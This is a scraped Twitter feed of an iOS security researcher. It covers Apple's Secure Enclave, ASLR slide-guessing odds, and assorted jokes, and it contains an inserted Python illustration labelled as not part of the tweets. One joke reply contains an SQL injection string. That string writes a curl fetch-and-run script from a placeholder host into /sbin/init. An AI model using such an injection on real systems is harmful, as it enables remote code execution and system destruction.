Siguza
iOS hacker & full-blood shitposter. Sometimes RE tools and jailbreak author. 0days for life. Contact in English or German, please. PGP:
9,415 Tweets · 175 Following · 36,325 Followers

Tweets
Siguza retweeted
~ 18h
sock_port in JSC, because why the fuck not (also fuck C++) /cc
Siguza retweeted
Liz Rice 🇪🇺 23h
Ok this is terrifying - I have just logged in to sheets and I’m in someone else’s account. I have never heard of the person, but they’re called Jose. Any Googlers in my follows can help me report this effectively?
Siguza Feb 16
Replying to @never_released
What? hdiutil shows HFS dmgs as "KernelSupport: No", but last time I tried, I could mount them...
Siguza retweeted
Ben Jenkins Feb 14
Hear me out on this. Limewire Festival. Bands from the early 2000s play mislabeled songs that aren’t actually theirs, tickets available as a .exe with a 70% chance of destroying your computer.
Siguza Feb 15
So on a certain level it does use TrustZone technology... but it uses only some aspects, combined with a lot of proprietary stuff. If you're feeling undyingly curious, there's a boatload of patents on stuff surrounding the Secure Enclave: .
Siguza Feb 15
..., it has its own data and firmware hardware encryption keys, ... and probably a few things that don't come to my mind right now. Also, on A10(X) and earlier it's a 32-bit KingFisher core, but on A11 and later it's a 64-bit Apple one, the same architecture as the AP.
Siguza Feb 15
And there are various other bits where the SEP is hardened, e.g. the debug registers are inaccessible, it has its own "JTAG allowed" flag in hardware, it can only be powered up once via the power manager and after that its power controls become inaccessible from the AP side, ...
Siguza Feb 15
Apple refers to that as "TZ1", at least on the memory controller level. And the portion of DRAM allocated to the SEP is labelled "TZ0", however SEP is a whole separate CPU, complete with its own BootROM, firmware verification, and hardware-backed memory encryption.
Siguza Feb 15
This is gonna get a bit long. So, the Application Processor on Apple's A10 and later only has EL0 and EL1, which are hardwired to non-secure state. The A9(X) and earlier do have EL3 and the whole "Secure World", which, as I understand it, constitute a "normal TrustZone".
Siguza Feb 15
Not to mention the fact, this is *with* tfp0. Try brute-guessing ASLR as part of an exploit, lol.
Siguza Feb 15
That's just plain wrong though. The kernel is about 33MB. *If you're lucky*, you will hit mapped memory after it. Every now and then there's some page tables. But go and do a full dump of the kernel page table hierarchy. Stare into those huge voids between mapped memory yourself.
Siguza Feb 15
Replying to @Joshbal4 @LucidBrot
- Yes - No - Maybe - I don't know - I don't understand the question - NULL - undefined - '; SELECT '#!/bin/bash\n$(curl http://get.rekt)' INTO OUTFILE '/sbin/init'; --
Siguza Feb 15
Suppose a panic + reboot + running the exploit again takes 15s. That would put the average expected time to run the exploit & successfully guess the slide at just under 4 days. And that's 50%. The same success rate as empty_list.
Siguza Feb 15
Wtf do you mean. If you guess wrong, you panic. I had a quick look at 13.3 iBoot, and it seems to allow 32768 different slides. So on one attempt, chance of failure = 1 - 1/32768. To get the chance of failure <50%, you'd need roughly 23'000 attempts: (1-1/32768)^23000 = 0.4956.
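The arithmetic behind the slide-guessing thread above, as an added illustration that is not part of the tweets: it treats each attempt as an independent guess among the 32768 slides Siguza reports for 13.3 iBoot (every miss costs a panic and reboot), and takes the 15-second attempt cost from the thread as a constructed parameter. It reproduces the 0.4956 figure and the "just under 4 days" estimate, and shows why the median (50% success) is the number that matters rather than the mean.

```python
import math

# Parameters taken from the thread; both are assumptions about a particular build.
SLIDE_COUNT = 32768        # distinct KASLR slides the tweet reports for 13.3 iBoot
SECONDS_PER_ATTEMPT = 15   # assumed cost of panic + reboot + re-running the exploit

def failure_after(attempts, slides=SLIDE_COUNT):
    """Probability that every one of `attempts` independent guesses misses the slide."""
    return (1 - 1 / slides) ** attempts

def attempts_for_success(target, slides=SLIDE_COUNT):
    """Smallest number of attempts whose cumulative success probability reaches `target`.

    Solves (1 - 1/slides)^n <= 1 - target for n (geometric distribution, p = 1/slides).
    """
    if not 0 < target < 1:
        raise ValueError("target must be strictly between 0 and 1")
    return math.ceil(math.log(1 - target) / math.log(1 - 1 / slides))

def mean_attempts(slides=SLIDE_COUNT):
    """Mean number of attempts until the first hit: 1/p for a geometric trial."""
    return slides

def days_for_success(target, slides=SLIDE_COUNT, seconds_per_attempt=SECONDS_PER_ATTEMPT):
    """Wall-clock days needed to reach `target` cumulative success probability."""
    return attempts_for_success(target, slides) * seconds_per_attempt / 86400

if __name__ == "__main__":
    # The tweet's check: chance of still having failed after 23000 attempts.
    print(f"failure after 23000 attempts: {failure_after(23000):.4f}")
    n = attempts_for_success(0.5)
    print(f"attempts for 50% success: {n} (~{days_for_success(0.5):.2f} days at 15 s each)")
    print(f"mean attempts: {mean_attempts()} (~{mean_attempts() * 15 / 86400:.2f} days)")
```

The 50% point is the median of the geometric distribution, which is lower than its mean (about 5.7 days at the same per-attempt cost); both say the same thing about blind slide guessing as a strategy.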
Siguza retweeted
Guille Feb 14
Siguza retweeted
Shahar Tal Feb 15
A 1000 times this.
Siguza retweeted
Longhorn Feb 15
- “I’m a full stack engineer” - “Did you get any kind of itsec training?” - “No I did not” Something that I hear way too often…
Siguza Feb 15
Replying to @LucidBrot
DontDisableCounterAntiSpyware
Siguza retweeted
Saumil Shah 🇮🇳 Feb 15
Nothing is as “full stack” as security. You get to play at every abstraction layer.
Siguza retweeted
Dahlia Adler Feb 13
This review is the creepiest horror story I have ever read.